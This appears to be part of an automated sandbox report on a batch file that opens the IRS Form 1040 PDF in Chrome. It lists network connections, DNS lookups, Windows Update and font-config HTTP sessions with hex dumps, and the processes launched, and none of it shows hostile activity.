                                Apr 25, 2024 15:12:28.953175068 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:28.953247070 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:29.321106911 CEST49703443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:29.360703945 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:29.360738039 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:29.360829115 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:29.362056017 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:29.362066984 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:29.478749037 CEST4434970323.1.237.91192.168.2.5
                                Apr 25, 2024 15:12:29.798821926 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:29.798944950 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:29.802061081 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:29.802072048 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:29.802372932 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:29.880506992 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.268882036 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.316123962 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552180052 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552202940 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552210093 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552228928 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552254915 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552254915 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.552262068 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552294970 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552314997 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.552352905 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.552375078 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552459955 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.552465916 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552475929 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.552515984 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.570635080 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.570650101 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:12:30.570672035 CEST49720443192.168.2.552.165.165.26
                                Apr 25, 2024 15:12:30.570678949 CEST4434972052.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:16.812021971 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:16.812061071 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:16.812151909 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:16.812463045 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:16.812480927 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.246655941 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.246813059 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.254128933 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.254152060 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.254471064 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.258306026 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.300127983 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.668567896 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.668586016 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.668628931 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.668821096 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.668837070 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.668853998 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.669002056 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.675331116 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.675345898 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.675374031 CEST49725443192.168.2.552.165.165.26
                                Apr 25, 2024 15:13:17.675381899 CEST4434972552.165.165.26192.168.2.5
                                Apr 25, 2024 15:13:17.681665897 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:17.681704044 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.681895971 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:17.682029009 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:17.682053089 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.937604904 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.937985897 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:17.938010931 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.939155102 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.939994097 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:17.940212965 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:17.993009090 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:27.930561066 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:27.930646896 CEST44349726142.250.9.104192.168.2.5
                                Apr 25, 2024 15:13:27.930701971 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:29.745263100 CEST49726443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:13:29.745291948 CEST44349726142.250.9.104192.168.2.5
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 25, 2024 15:12:13.521466970 CEST6238253192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:13.521608114 CEST5400153192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:13.628976107 CEST53639931.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:13.641753912 CEST53509921.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:14.306515932 CEST53558281.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:16.724708080 CEST6428953192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:16.725131035 CEST6064053192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:17.623420954 CEST5238353192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:17.623780012 CEST5006953192.168.2.51.1.1.1
                                Apr 25, 2024 15:12:17.734462023 CEST53523831.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:17.734529972 CEST53500691.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:31.313211918 CEST53511811.1.1.1192.168.2.5
                                Apr 25, 2024 15:12:56.654637098 CEST53588641.1.1.1192.168.2.5
                                Apr 25, 2024 15:13:13.440411091 CEST53517221.1.1.1192.168.2.5
                                Apr 25, 2024 15:13:13.444080114 CEST53639061.1.1.1192.168.2.5
                                Apr 25, 2024 15:13:43.933370113 CEST53573571.1.1.1192.168.2.5
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 25, 2024 15:12:13.521466970 CEST192.168.2.51.1.1.10x325eStandard query (0)www.irs.govA (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:13.521608114 CEST192.168.2.51.1.1.10xb8eStandard query (0)www.irs.gov65IN (0x0001)false
                                Apr 25, 2024 15:12:16.724708080 CEST192.168.2.51.1.1.10x51a9Standard query (0)www.irs.govA (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:16.725131035 CEST192.168.2.51.1.1.10xd005Standard query (0)www.irs.gov65IN (0x0001)false
                                Apr 25, 2024 15:12:17.623420954 CEST192.168.2.51.1.1.10x4472Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.623780012 CEST192.168.2.51.1.1.10x4d11Standard query (0)www.google.com65IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 25, 2024 15:12:13.633373976 CEST1.1.1.1192.168.2.50xb8eNo error (0)www.irs.govwww.irs.gov.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                Apr 25, 2024 15:12:13.633708954 CEST1.1.1.1192.168.2.50x325eNo error (0)www.irs.govwww.irs.gov.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                Apr 25, 2024 15:12:16.835016966 CEST1.1.1.1192.168.2.50xd005No error (0)www.irs.govwww.irs.gov.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                Apr 25, 2024 15:12:16.836611986 CEST1.1.1.1192.168.2.50x51a9No error (0)www.irs.govwww.irs.gov.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734462023 CEST1.1.1.1192.168.2.50x4472No error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                Apr 25, 2024 15:12:17.734529972 CEST1.1.1.1192.168.2.50x4d11No error (0)www.google.com65IN (0x0001)false
                                • fs.microsoft.com
                                • slscr.update.microsoft.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549718184.31.62.93443
                                TimestampBytes transferredDirectionData
                                2024-04-25 13:12:18 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-04-25 13:12:18 UTC467INHTTP/1.1 200 OK
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                Content-Type: application/octet-stream
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                Server: ECAcc (chd/0790)
                                X-CID: 11
                                X-Ms-ApiVersion: Distribute 1.2
                                X-Ms-Region: prod-eus-z1
                                Cache-Control: public, max-age=150677
                                Date: Thu, 25 Apr 2024 13:12:18 GMT
                                Connection: close
                                X-CID: 2


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549719184.31.62.93443
                                TimestampBytes transferredDirectionData
                                2024-04-25 13:12:18 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                Range: bytes=0-2147483646
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-04-25 13:12:19 UTC515INHTTP/1.1 200 OK
                                ApiVersion: Distribute 1.1
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                Content-Type: application/octet-stream
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                Server: ECAcc (chd/0758)
                                X-CID: 11
                                X-Ms-ApiVersion: Distribute 1.2
                                X-Ms-Region: prod-eus-z1
                                Cache-Control: public, max-age=150676
                                Date: Thu, 25 Apr 2024 13:12:19 GMT
                                Content-Length: 55
                                Connection: close
                                X-CID: 2
                                2024-04-25 13:12:19 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.54972052.165.165.26443
                                TimestampBytes transferredDirectionData
                                2024-04-25 13:12:30 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mS8f1Gbn84nXFYB&MD=Pu3PAxcs HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-04-25 13:12:30 UTC560INHTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                MS-CorrelationId: db179529-f5cb-4632-a2c7-f648296b6b06
                                MS-RequestId: 734c1648-1d74-4fa5-b78d-d1d53cd73312
                                MS-CV: AeFUajvCU0KpLDNx.0
                                X-Microsoft-SLSClientCache: 2880
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Thu, 25 Apr 2024 13:12:29 GMT
                                Connection: close
                                Content-Length: 24490
                                2024-04-25 13:12:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                2024-04-25 13:12:30 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.54972552.165.165.26443
                                TimestampBytes transferredDirectionData
                                2024-04-25 13:13:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mS8f1Gbn84nXFYB&MD=Pu3PAxcs HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-04-25 13:13:17 UTC560INHTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                MS-CorrelationId: 7451bab3-4948-4da6-bc1d-44f995226980
                                MS-RequestId: 63ca3955-af5f-4b64-bd82-aaa83f3f8131
                                MS-CV: D+sTvkoM0Uavcz8K.0
                                X-Microsoft-SLSClientCache: 2160
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Thu, 25 Apr 2024 13:13:17 GMT
                                Connection: close
                                Content-Length: 25457
                                2024-04-25 13:13:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                2024-04-25 13:13:17 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                Click to jump to process

                                Click to jump to process

                                Click to jump to process

                                Target ID:0
                                Start time:15:12:10
                                Start date:25/04/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\d.bat" "
                                Imagebase:0x7ff742d70000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:15:12:10
                                Start date:25/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:15:12:10
                                Start date:25/04/2024
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf
                                Imagebase:0x7ff715980000
                                File size:3'242'272 bytes
                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:5
                                Start time:15:12:11
                                Start date:25/04/2024
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,8690622242313858414,1291820735043739184,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                Imagebase:0x7ff715980000
                                File size:3'242'272 bytes
                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                No disassembly